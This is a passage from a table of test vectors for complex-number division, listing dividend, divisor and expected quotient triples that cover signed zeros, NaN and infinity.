-zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(2, zero), complex(zero, zero), complex(inf, nan)}, {complex(2, zero), complex(zero, -zero), complex(inf, nan)}, {complex(2, zero), complex(zero, 1), complex(zero, -2)}, {complex(2, zero), complex(zero, -1), complex(-zero, 2)}, {complex(2, zero), complex(zero, 2), complex(zero, -1)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, zero), complex(zero, zero), complex(inf, nan)}, {complex(2, zero), complex(-zero, -zero), complex(-inf, nan)}, {complex(2, zero), complex(zero, 1), complex(zero, -2)}, {complex(2, zero), complex(-zero, -1), complex(-zero, 2)}, {complex(2, zero), complex(zero, 2), complex(zero, -1)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, zero), complex(1, zero), complex(2, zero)}, {complex(2, zero), complex(1, -zero), complex(2, zero)}, {complex(2, zero), complex(1, 1), complex(1, -1)}, {complex(2, zero), complex(1, -1), complex(1, 1)}, {complex(2, zero), complex(1, 2), complex(0.4, -0.8)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, zero), complex(-1, zero), complex(-2, -zero)}, {complex(2, zero), complex(-1, -zero), complex(-2, -zero)}, {complex(2, zero), complex(-1, 1), complex(-1, -1)}, {complex(2, zero), complex(-1, -1), complex(-1, 1)}, {complex(2, zero), complex(-1, 2), complex(-0.4, -0.8)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, zero), complex(2, zero), complex(1, zero)}, {complex(2, zero), complex(2, -zero), complex(1, zero)}, {complex(2, zero), complex(2, 1), complex(0.8, -0.4)}, {complex(2, zero), complex(2, -1), complex(0.8, 0.4)}, {complex(2, zero), complex(2, 2), complex(0.5, -0.5)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, zero), complex(nan, zero), complex(nan, nan)}, {complex(2, zero), complex(nan, -zero), complex(nan, nan)}, {complex(2, zero), complex(nan, 1), complex(nan, nan)}, {complex(2, zero), complex(nan, -1), complex(nan, nan)}, {complex(2, zero), complex(nan, 2), complex(nan, nan)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, zero), complex(inf, zero), complex(zero, zero)}, {complex(2, zero), complex(inf, -zero), complex(zero, zero)}, {complex(2, zero), complex(inf, 1), complex(zero, zero)}, {complex(2, zero), complex(inf, -1), complex(zero, zero)}, {complex(2, zero), complex(inf, 2), complex(zero, zero)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, zero), complex(-inf, zero), complex(-zero, -zero)}, {complex(2, zero), complex(-inf, -zero), complex(-zero, -zero)}, {complex(2, zero), complex(-inf, 1), complex(-zero, -zero)}, {complex(2, zero), complex(-inf, -1), complex(-zero, -zero)}, {complex(2, zero), complex(-inf, 2), complex(-zero, -zero)}, {complex(2, zero), complex(nan, nan), complex(nan, nan)}, {complex(2, zero), complex(nan, inf), complex(zero, -zero)}, {complex(2, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(2, -zero), complex(zero, zero), complex(inf, nan)}, {complex(2, -zero), complex(zero, -zero), complex(inf, nan)}, {complex(2, -zero), complex(zero, 1), complex(zero, -2)}, {complex(2, -zero), complex(zero, -1), complex(zero, 2)}, {complex(2, -zero), complex(zero, 2), complex(zero, -1)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, -zero), complex(zero, zero), complex(inf, nan)}, {complex(2, -zero), complex(-zero, -zero), complex(-inf, nan)}, {complex(2, -zero), complex(zero, 1), complex(zero, -2)}, {complex(2, -zero), complex(-zero, -1), complex(-zero, 2)}, {complex(2, -zero), complex(zero, 2), complex(zero, -1)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, -zero), complex(1, zero), complex(2, -zero)}, {complex(2, -zero), complex(1, -zero), complex(2, zero)}, {complex(2, -zero), complex(1, 1), complex(1, -1)}, {complex(2, -zero), complex(1, -1), complex(1, 1)}, {complex(2, -zero), complex(1, 2), complex(0.4, -0.8)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, -zero), complex(-1, zero), complex(-2, -zero)}, {complex(2, -zero), complex(-1, -zero), complex(-2, zero)}, {complex(2, -zero), complex(-1, 1), complex(-1, -1)}, {complex(2, -zero), complex(-1, -1), complex(-1, 1)}, {complex(2, -zero), complex(-1, 2), complex(-0.4, -0.8)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, -zero), complex(2, zero), complex(1, -zero)}, {complex(2, -zero), complex(2, -zero), complex(1, zero)}, {complex(2, -zero), complex(2, 1), complex(0.8, -0.4)}, {complex(2, -zero), complex(2, -1), complex(0.8, 0.4)}, {complex(2, -zero), complex(2, 2), complex(0.5, -0.5)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, -zero), complex(nan, zero), complex(nan, nan)}, {complex(2, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(2, -zero), complex(nan, 1), complex(nan, nan)}, {complex(2, -zero), complex(nan, -1), complex(nan, nan)}, {complex(2, -zero), complex(nan, 2), complex(nan, nan)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, -zero), complex(inf, zero), complex(zero, -zero)}, {complex(2, -zero), complex(inf, -zero), complex(zero, zero)}, {complex(2, -zero), complex(inf, 1), complex(zero, -zero)}, {complex(2, -zero), complex(inf, -1), complex(zero, zero)}, {complex(2, -zero), complex(inf, 2), complex(zero, -zero)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, -zero), complex(-inf, zero), complex(-zero, -zero)}, {complex(2, -zero), complex(-inf, -zero), complex(-zero, zero)}, {complex(2, -zero), complex(-inf, 1), complex(-zero, -zero)}, {complex(2, -zero), complex(-inf, -1), complex(-zero, zero)}, {complex(2, -zero), complex(-inf, 2), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, nan), complex(nan, nan)}, {complex(2, -zero), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(2, 1), complex(zero, zero), complex(inf, inf)}, {complex(2, 1), complex(zero, -zero), complex(inf, inf)}, {complex(2, 1), complex(zero, 1), complex(1, -2)}, {complex(2, 1), complex(zero, -1), complex(-1, 2)}, {complex(2, 1), complex(zero, 2), complex(0.5, -1)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 1), complex(zero, zero), complex(inf, inf)}, {complex(2, 1), complex(-zero, -zero), complex(-inf, -inf)}, {complex(2, 1), complex(zero, 1), complex(1, -2)}, {complex(2, 1), complex(-zero, -1), complex(-1, 2)}, {complex(2, 1), complex(zero, 2), complex(0.5, -1)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 1), complex(1, zero), complex(2, 1)}, {complex(2, 1), complex(1, -zero), complex(2, 1)}, {complex(2, 1), complex(1, 1), complex(1.5, -0.5)}, {complex(2, 1), complex(1, -1), complex(0.5, 1.5)}, {complex(2, 1), complex(1, 2), complex(0.8, -0.6)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 1), complex(-1, zero), complex(-2, -1)}, {complex(2, 1), complex(-1, -zero), complex(-2, -1)}, {complex(2, 1), complex(-1, 1), complex(-0.5, -1.5)}, {complex(2, 1), complex(-1, -1), complex(-1.5, 0.5)}, {complex(2, 1), complex(-1, 2), complex(zero, -1)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 1), complex(2, zero), complex(1, 0.5)}, {complex(2, 1), complex(2, -zero), complex(1, 0.5)}, {complex(2, 1), complex(2, 1), complex(1, zero)}, {complex(2, 1), complex(2, -1), complex(0.6, 0.8)}, {complex(2, 1), complex(2, 2), complex(0.75, -0.25)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 1), complex(nan, zero), complex(nan, nan)}, {complex(2, 1), complex(nan, -zero), complex(nan, nan)}, {complex(2, 1), complex(nan, 1), complex(nan, nan)}, {complex(2, 1), complex(nan, -1), complex(nan, nan)}, {complex(2, 1), complex(nan, 2), complex(nan, nan)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 1), complex(inf, zero), complex(zero, zero)}, {complex(2, 1), complex(inf, -zero), complex(zero, zero)}, {complex(2, 1), complex(inf, 1), complex(zero, zero)}, {complex(2, 1), complex(inf, -1), complex(zero, zero)}, {complex(2, 1), complex(inf, 2), complex(zero, zero)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 1), complex(-inf, zero), complex(-zero, -zero)}, {complex(2, 1), complex(-inf, -zero), complex(-zero, -zero)}, {complex(2, 1), complex(-inf, 1), complex(-zero, -zero)}, {complex(2, 1), complex(-inf, -1), complex(-zero, -zero)}, {complex(2, 1), complex(-inf, 2), complex(-zero, -zero)}, {complex(2, 1), complex(nan, nan), complex(nan, nan)}, {complex(2, 1), complex(nan, inf), complex(zero, -zero)}, {complex(2, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(2, -1), complex(zero, zero), complex(inf, -inf)}, {complex(2, -1), complex(zero, -zero), complex(inf, -inf)}, {complex(2, -1), complex(zero, 1), complex(-1, -2)}, {complex(2, -1), complex(zero, -1), complex(1, 2)}, {complex(2, -1), complex(zero, 2), complex(-0.5, -1)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, -1), complex(zero, zero), complex(inf, -inf)}, {complex(2, -1), complex(-zero, -zero), complex(-inf, inf)}, {complex(2, -1), complex(zero, 1), complex(-1, -2)}, {complex(2, -1), complex(-zero, -1), complex(1, 2)}, {complex(2, -1), complex(zero, 2), complex(-0.5, -1)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, -1), complex(1, zero), complex(2, -1)}, {complex(2, -1), complex(1, -zero), complex(2, -1)}, {complex(2, -1), complex(1, 1), complex(0.5, -1.5)}, {complex(2, -1), complex(1, -1), complex(1.5, 0.5)}, {complex(2, -1), complex(1, 2), complex(zero, -1)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, -1), complex(-1, zero), complex(-2, 1)}, {complex(2, -1), complex(-1, -zero), complex(-2, 1)}, {complex(2, -1), complex(-1, 1), complex(-1.5, -0.5)}, {complex(2, -1), complex(-1, -1), complex(-0.5, 1.5)}, {complex(2, -1), complex(-1, 2), complex(-0.8, -0.6)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, -1), complex(2, zero), complex(1, -0.5)}, {complex(2, -1), complex(2, -zero), complex(1, -0.5)}, {complex(2, -1), complex(2, 1), complex(0.6, -0.8)}, {complex(2, -1), complex(2, -1), complex(1, zero)}, {complex(2, -1), complex(2, 2), complex(0.25, -0.75)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, -1), complex(nan, zero), complex(nan, nan)}, {complex(2, -1), complex(nan, -zero), complex(nan, nan)}, {complex(2, -1), complex(nan, 1), complex(nan, nan)}, {complex(2, -1), complex(nan, -1), complex(nan, nan)}, {complex(2, -1), complex(nan, 2), complex(nan, nan)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, -1), complex(inf, zero), complex(zero, -zero)}, {complex(2, -1), complex(inf, -zero), complex(zero, -zero)}, {complex(2, -1), complex(inf, 1), complex(zero, -zero)}, {complex(2, -1), complex(inf, -1), complex(zero, -zero)}, {complex(2, -1), complex(inf, 2), complex(zero, -zero)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, -1), complex(-inf, zero), complex(-zero, zero)}, {complex(2, -1), complex(-inf, -zero), complex(-zero, zero)}, {complex(2, -1), complex(-inf, 1), complex(-zero, zero)}, {complex(2, -1), complex(-inf, -1), complex(-zero, zero)}, {complex(2, -1), complex(-inf, 2), complex(-zero, zero)}, {complex(2, -1), complex(nan, nan), complex(nan, nan)}, {complex(2, -1), complex(nan, inf), complex(-zero, -zero)}, {complex(2, -1), complex(nan, -inf), complex(zero, zero)}, {complex(2, 2), complex(zero, zero), complex(inf, inf)}, {complex(2, 2), complex(zero, -zero), complex(inf, inf)}, {complex(2, 2), complex(zero, 1), complex(2, -2)}, {complex(2, 2), complex(zero, -1), complex(-2, 2)}, {complex(2, 2), complex(zero, 2), complex(1, -1)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 2), complex(zero, zero), complex(inf, inf)}, {complex(2, 2), complex(-zero, -zero), complex(-inf, -inf)}, {complex(2, 2), complex(zero, 1), complex(2, -2)}, {complex(2, 2), complex(-zero, -1), complex(-2, 2)}, {complex(2, 2), complex(zero, 2), complex(1, -1)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 2), complex(1, zero), complex(2, 2)}, {complex(2, 2), complex(1, -zero), complex(2, 2)}, {complex(2, 2), complex(1, 1), complex(2, zero)}, {complex(2, 2), complex(1, -1), complex(zero, 2)}, {complex(2, 2), complex(1, 2), complex(1.2, -0.4)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 2), complex(-1, zero), complex(-2, -2)}, {complex(2, 2), complex(-1, -zero), complex(-2, -2)}, {complex(2, 2), complex(-1, 1), complex(-zero, -2)}, {complex(2, 2), complex(-1, -1), complex(-2, -zero)}, {complex(2, 2), complex(-1, 2), complex(0.4, -1.2)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 2), complex(2, zero), complex(1, 1)}, {complex(2, 2), complex(2, -zero), complex(1, 1)}, {complex(2, 2), complex(2, 1), complex(1.2, 0.4)}, {complex(2, 2), complex(2, -1), complex(0.4, 1.2)}, {complex(2, 2), complex(2, 2), complex(1, zero)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 2), complex(nan, zero), complex(nan, nan)}, {complex(2, 2), complex(nan, -zero), complex(nan, nan)}, {complex(2, 2), complex(nan, 1), complex(nan, nan)}, {complex(2, 2), complex(nan, -1), complex(nan, nan)}, {complex(2, 2), complex(nan, 2), complex(nan, nan)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 2), complex(inf, zero), complex(zero, zero)}, {complex(2, 2), complex(inf, -zero), complex(zero, zero)}, {complex(2, 2), complex(inf, 1), complex(zero, zero)}, {complex(2, 2), complex(inf, -1), complex(zero, zero)}, {complex(2, 2), complex(inf, 2), complex(zero, zero)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(2, 2), complex(-inf, zero), complex(-zero, -zero)}, {complex(2, 2), complex(-inf, -zero), complex(-zero, -zero)}, {complex(2, 2), complex(-inf, 1), complex(-zero, -zero)}, {complex(2, 2), complex(-inf, -1), complex(-zero, -zero)}, {complex(2, 2), complex(-inf, 2), complex(-zero, -zero)}, {complex(2, 2), complex(nan, nan), complex(nan, nan)}, {complex(2, 2), complex(nan, inf), complex(zero, -zero)}, {complex(2, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, 